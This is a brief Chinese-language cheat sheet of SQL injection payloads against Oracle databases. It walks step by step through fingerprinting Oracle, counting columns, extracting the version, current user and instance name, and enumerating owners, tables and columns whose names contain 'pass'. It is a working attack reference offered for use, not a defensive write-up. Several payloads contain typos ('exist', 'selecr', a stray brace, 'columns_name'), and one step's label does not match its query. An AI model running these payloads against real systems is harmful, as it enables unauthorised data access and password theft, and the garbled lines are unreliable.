sql注入oracle
1. 判断为oracle
and exist (select * from dual ) 或者and (selecr count(*) from user_tables)>0 --
2. 获取基本信息
(1) 获取字段数
order by N
(2) 获取数据库版本
and 1=2 union select 1,2,(select banner from sys.v_$version where rownum =1),4,5 from dual
(3)获取数据库连接名
and 1=2 union select 1,2,{select sys_context('userenv','current_user') from dual),4 from dual
(4)获取日志文件的绝对路径
and 1=2 union select 1,2,(select instance_name from v$instance) from dual
3. 猜测数据库名/表和列名
(1)数据库名
and 1=2 union select (select owner from all_tables where rownum =1) from dual
(2)依次爆出数据库名
and 1=2 union select (select owner from all_tables where rownum =1 and owner<>'sys') from dual
(3)爆出表名
and 1=2 union select (select table_name from user_tables where rownum =1 ) from dual
and (select column_name from user_tab_columns where column_name like '%25pass%25')>0
and 1=2 union select (select column_name from user_tab_columns where columns_name like '%25pass%25') from dual
(4)爆出字段名
and 1=2 union select (select column_name from user_tab_columns where table_name = 'bonus' and rownum =1 )from dual
(注意:表名要大写)